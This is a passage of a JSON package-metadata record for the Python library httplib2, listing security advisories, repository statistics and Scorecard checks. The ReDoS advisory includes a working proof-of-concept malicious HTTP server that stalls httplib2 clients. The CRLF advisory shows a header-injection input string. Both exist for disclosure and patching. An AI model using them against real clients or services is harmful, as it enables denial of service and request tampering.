by attacker) |\n| Amplification ratio | ~1,029x |\n| Authentication required | None |\n| User interaction required | None |\n| Prerequisites | Client makes any HTTP request to attacker-controlled server |\n\n**Real-world scenarios:**\n- **Web scrapers/crawlers** that fetch pages from untrusted URLs\n- **API clients** connecting to third-party services\n- **Webhook handlers** that follow redirects to attacker-controlled endpoints\n- **CI/CD pipelines** that download dependencies or artifacts over HTTP\n- **Any MITM attacker** on an unencrypted HTTP connection can inject the compressed payload\n\n**Impact scaling:** The attacker can create arbitrarily large decompression bombs. A 1 MB compressed payload can decompress to several gigabytes, guaranteeing OOM-kill on virtually any system. The attack is fully deterministic and requires only a single HTTP response.\n\n**Downstream exposure:** `httplib2` is a widely used Python HTTP client library with millions of downloads. It is a dependency of Google's API client libraries (`google-api-python-client`, `google-auth-httplib2`), meaning applications using Google Cloud APIs may be indirectly affected if they process responses from untrusted intermediaries.\n\n---\n### Credit\n\nFound by a security research team from the University of Sydney, focusing on detecting open source software vulnerabilities.\nLiyi Zhou: https://lzhou1110.github.io/\nZiyue Wang: https://zyy0530.github.io/\nStrick: https://str1ckl4nd.github.io/\nMaurice: https://maurice.busystar.org/\nChenchen Yu: https://7thparkk.github.io/","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-24T15:15:05.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/httplib2/httplib2/security/advisories/GHSA-j5g9-f88f-gfj3","https://nvd.nist.gov/vuln/detail/CVE-2026-59939","https://github.com/httplib2/httplib2/commit/87581ad6cf752fe3da2090c59058261d2d00a427","https://github.com/httplib2/httplib2/releases/tag/v0.32.0","https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml","https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html","https://github.com/advisories/GHSA-j5g9-f88f-gfj3"],"source_kind":"github","identifiers":["GHSA-j5g9-f88f-gfj3","CVE-2026-59939"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T16:00:08.675Z","updated_at":"2026-08-21T12:00:32.418Z","epss_percentage":0.0041,"epss_percentile":0.33543,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qNWc5LWY4OGYtZ2ZqM84ABfpq","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qNWc5LWY4OGYtZ2ZqM84ABfpq","packages":[{"ecosystem":"pypi","package_name":"httplib2","versions":[{"first_patched_version":"0.32.0","vulnerable_version_range":"\u003c 0.32.0"}],"purl":"pkg:pypi/httplib2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qNWc5LWY4OGYtZ2ZqM84ABfpq/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xNDhxLTc3cXYtY2Y5cM4AAUp3","url":"https://github.com/advisories/GHSA-q48q-77qv-cf9p","title":"httplib2 incorrectly checks SSL certificate","description":"httplib2 prior to version 0.10.1, after an initial connection is made, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-05-14T01:52:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U","references":["https://nvd.nist.gov/vuln/detail/CVE-2013-2037","https://bugs.launchpad.net/httplib2/+bug/1175272","http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706602","http://code.google.com/p/httplib2/issues/detail?id=282","http://seclists.org/oss-sec/2013/q2/257","http://www.ubuntu.com/usn/USN-1948-1","https://github.com/httplib2/httplib2/issues/5","https://github.com/httplib2/httplib2/commit/40cbdcc8586f2292fa0e76a3e8c012f0cc9ed919","https://web.archive.org/web/20200228052625/http://www.securityfocus.com/bid/52179","https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2014-81.yaml","https://github.com/advisories/GHSA-q48q-77qv-cf9p"],"source_kind":"github","identifiers":["GHSA-q48q-77qv-cf9p","CVE-2013-2037"],"repository_url":"https://github.com/httplib2/httplib2","blast_radius":30.91464444741103,"created_at":"2024-04-29T12:05:35.869Z","updated_at":"2026-08-19T22:07:17.661Z","epss_percentage":0.01324,"epss_percentile":0.685,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xNDhxLTc3cXYtY2Y5cM4AAUp3","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xNDhxLTc3cXYtY2Y5cM4AAUp3","packages":[{"ecosystem":"pypi","package_name":"httplib2","versions":[{"first_patched_version":"0.10.1","vulnerable_version_range":"\u003c 0.10.1"}],"purl":"pkg:pypi/httplib2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xNDhxLTc3cXYtY2Y5cM4AAUp3/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTkzeGotOG1ydi00NDRt","url":"https://github.com/advisories/GHSA-93xj-8mrv-444m","title":"Regular Expression Denial of Service (REDoS) in httplib2","description":"### Impact\nA malicious server which responds with long series of `\\xa0` characters in the `www-authenticate` header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.\n\n### Patches\nVersion 0.19.0 contains new implementation of auth headers parsing, using pyparsing library.\nhttps://github.com/httplib2/httplib2/pull/182\n\n### Workarounds\n```py\nimport httplib2\nhttplib2.USE_WWW_AUTH_STRICT_PARSING = True\n```\n\n### Technical Details\n\nThe vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/__init__.py#L336-L338\n\nThe section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:\n\n    \\s*[^ \\t\\r\\n=]+\\s*=\n\nSince all three infinitely repeating groups accept the non-breaking space character `\\xa0`, a long string of `\\xa0` causes catastrophic backtracking.\n\nThe complexity is cubic, so doubling the length of the malicious string of `\\xa0` makes processing take 8 times as long.\n\n### Reproduction Steps\n\nRun a malicious server which responds with\n\n    www-authenticate: x \\xa0\\xa0\\xa0\\xa0x\n\nbut with many more `\\xa0` characters.\n\nAn example malicious python server is below:\n\n```py\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\ndef make_header_value(n_spaces):\n    repeat = \"\\xa0\" * n_spaces\n    return f\"x {repeat}x\"\n\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.log_request(401)\n        self.send_response_only(401)  # Don't bother sending Server and Date\n        n_spaces = (\n            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences\n            if len(self.path) \u003e 1 else\n            65512  # Max header line length 65536\n        )\n        value = make_header_value(n_spaces)\n        self.send_header(\"www-authenticate\", value)  # This header can actually be sent multiple times\n        self.end_headers()\n\nif __name__ == \"__main__\":\n    HTTPServer((\"\", 1337), Handler).serve_forever()\n```\n\nConnect to the server with httplib2:\n\n```py\nimport httplib2\nhttplib2.Http(\".cache\").request(\"http://localhost:1337\", \"GET\")\n```\n\nTo benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000\n\n\n### References\nThanks to [Ben Caller](https://github.com/b-c-ds) ([Doyensec](https://doyensec.com)) for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2021-01](mailto:temotor@gmail.com)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2021-02-08T19:41:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P","references":["https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m","https://github.com/httplib2/httplib2/pull/182","https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc","https://nvd.nist.gov/vuln/detail/CVE-2021-21240","https://pypi.org/project/httplib2","https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2021-16.yaml","https://github.com/advisories/GHSA-93xj-8mrv-444m"],"source_kind":"github","identifiers":["GHSA-93xj-8mrv-444m","CVE-2021-21240"],"repository_url":"https://github.com/httplib2/httplib2","blast_radius":36.0670851886462,"created_at":"2022-12-21T16:13:11.600Z","updated_at":"2026-08-19T22:06:18.146Z","epss_percentage":0.03983,"epss_percentile":0.89614,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTkzeGotOG1ydi00NDRt","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTkzeGotOG1ydi00NDRt","packages":[{"ecosystem":"pypi","package_name":"httplib2","versions":[{"first_patched_version":"0.19.0","vulnerable_version_range":"\u003c 0.19.0"}],"purl":"pkg:pypi/httplib2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTkzeGotOG1ydi00NDRt/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWdnODQtcWd2OS13NHBx","url":"https://github.com/advisories/GHSA-gg84-qgv9-w4pq","title":"CRLF injection in httplib2","description":"### Impact\nAttacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server.\n\nImpacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.\n\n### Patches\nProblem has been fixed in 0.18.0\nSpace, CR, LF characters are now quoted before any use.\nThis solution should not impact any valid usage of httplib2 library, that is uri constructed by urllib.\n\n### Workarounds\nCreate URI with `urllib.parse` family functions: `urlencode`, `urlunsplit`.\n\n```diff\nuser_input = \" HTTP/1.1\\r\\ninjected: attack\\r\\nignore-http:\"\n-uri = \"https://api.server/?q={}\".format(user_input)\n+uri = urllib.parse.urlunsplit((\"https\", \"api.server\", \"/v1\", urllib.parse.urlencode({\"q\": user_input}), \"\"))\nhttp.request(uri)\n```\n\n### References\nhttps://cwe.mitre.org/data/definitions/93.html\nhttps://docs.python.org/3/library/urllib.parse.html\n\nThanks to Recar https://github.com/Ciyfly for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2020-05](mailto:temotor@gmail.com)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2020-05-20T15:55:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N","references":["https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq","https://github.com/httplib2/httplib2/commit/a1457cc31f3206cf691d11d2bf34e98865873e9e","https://nvd.nist.gov/vuln/detail/CVE-2020-11078","https://lists.apache.org/thread.html/rc9eff9572946142b657c900fe63ea4bbd3535911e8d4ce4d08fe4b89@%3Ccommits.allura.apache.org%3E","https://lists.debian.org/debian-lts-announce/2020/06/msg00000.html","https://lists.apache.org/thread.html/r23711190c2e98152cb6f216b95090d5eeb978543bb7e0bad22ce47fc@%3Cissues.beam.apache.org%3E","https://lists.apache.org/thread.html/r69a462e690b5f2c3d418a288a2c98ae764d58587bd0b5d6ab141f25f@%3Cissues.beam.apache.org%3E","https://lists.apache.org/thread.html/rad8872fc99f670958c2774e2bf84ee32a3a0562a0c787465cf3dfa23@%3Cissues.beam.apache.org%3E","https://lists.apache.org/thread.html/r4d35dac106fab979f0db75a07fc4e320ad848b722103e79667ff99e1@%3Cissues.beam.apache.org%3E","https://lists.apache.org/thread.html/r7f364000066748299b331b615ba51c62f55ab5b201ddce9a22d98202@%3Cissues.beam.apache.org%3E","https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2020-46.yaml","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IXCX2AWROGWGY5GXR7VN3BKF34A2FO6J","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PZJ3D6JSM7CFZESZZKGUW2VX55BOSOXI","https://github.com/advisories/GHSA-gg84-qgv9-w4pq"],"source_kind":"github","identifiers":["GHSA-gg84-qgv9-w4pq","CVE-2020-11078"],"repository_url":"https://github.com/httplib2/httplib2","blast_radius":29.509433336165074,"created_at":"2022-12-21T16:13:24.711Z","updated_at":"2026-07-14T03:05:05.771Z","epss_percentage":0.02593,"epss_percentile":0.83507,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWdnODQtcWd2OS13NHBx","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWdnODQtcWd2OS13NHBx","packages":[{"ecosystem":"pypi","package_name":"httplib2","versions":[{"first_patched_version":"0.18.0","vulnerable_version_range":"\u003c 0.18.0"}],"purl":"pkg:pypi/httplib2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWdnODQtcWd2OS13NHBx/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/httplib2","docker_dependents_count":6178,"docker_downloads_count":5889819572,"usage_url":"https://repos.ecosyste.ms/usage/pypi/httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/httplib2/dependencies","status":null,"funding_links":[],"critical":true,"issue_metadata":{"last_synced_at":"2024-09-08T01:27:11.126Z","issues_count":58,"pull_requests_count":51,"avg_time_to_close_issue":12410295.225806452,"avg_time_to_close_pull_request":6105526.0,"issues_closed_count":31,"pull_requests_closed_count":37,"pull_request_authors_count":38,"issue_authors_count":53,"avg_comments_per_issue":4.0,"avg_comments_per_pull_request":2.627450980392157,"merged_pull_requests_count":28,"bot_issues_count":0,"bot_pull_requests_count":2,"past_year_issues_count":4,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":26.0,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":1,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":2,"past_year_issue_authors_count":4,"past_year_avg_comments_per_issue":0.75,"past_year_avg_comments_per_pull_request":1.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/httplib2/codemeta","maintainers":[{"uuid":"graffatcolmingov","login":"graffatcolmingov","name":null,"email":null,"url":null,"packages_count":52,"html_url":"https://pypi.org/user/graffatcolmingov/","role":null,"created_at":"2022-12-13T16:56:58.633Z","updated_at":"2022-12-13T16:56:58.633Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/graffatcolmingov/packages"},{"uuid":"cdent","login":"cdent","name":null,"email":null,"url":null,"packages_count":78,"html_url":"https://pypi.org/user/cdent/","role":null,"created_at":"2022-12-13T16:56:58.619Z","updated_at":"2022-12-13T16:56:58.619Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/cdent/packages"},{"uuid":"jcgregorio","login":"jcgregorio","name":null,"email":null,"url":null,"packages_count":4,"html_url":"https://pypi.org/user/jcgregorio/","role":null,"created_at":"2022-12-13T16:56:58.643Z","updated_at":"2022-12-13T16:56:58.643Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/jcgregorio/packages"},{"uuid":"Sergey.Shepelev","login":"Sergey.Shepelev","name":null,"email":null,"url":null,"packages_count":2,"html_url":"https://pypi.org/user/Sergey.Shepelev/","role":null,"created_at":"2022-12-13T16:56:58.657Z","updated_at":"2022-12-13T16:56:58.657Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/Sergey.Shepelev/packages"},{"uuid":"httplib2.release","login":"httplib2.release","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://pypi.org/user/httplib2.release/","role":null,"created_at":"2022-12-13T16:56:58.668Z","updated_at":"2022-12-13T16:56:58.668Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/httplib2.release/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":930641,"maintainers_count":399816,"namespaces_count":0,"keywords_count":311995,"github":"pypi","metadata":{"funded_packages_count":58611,"rate_limit":2},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-08-25T05:06:24.344Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":75481,"name":"py-httplib2","ecosystem":"spack","description":"A comprehensive HTTP client library.\n","homepage":"https://github.com/httplib2/httplib2","licenses":"[]","normalized_licenses":["Other"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":null,"versions_count":4,"first_release_published_at":"2022-04-05T09:25:09.746Z","latest_release_published_at":"2023-07-02T00:51:55.166Z","latest_release_number":"0.22.0","last_synced_at":"2026-08-24T13:47:05.469Z","created_at":"2022-04-05T09:25:09.717Z","updated_at":"2026-08-24T13:47:05.469Z","registry_url":"https://packages.spack.io/package.html?name=py-httplib2","install_command":"spack install py-httplib2","documentation_url":null,"metadata":{},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":511,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-14T10:56:27.493Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-14T08:37:00.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 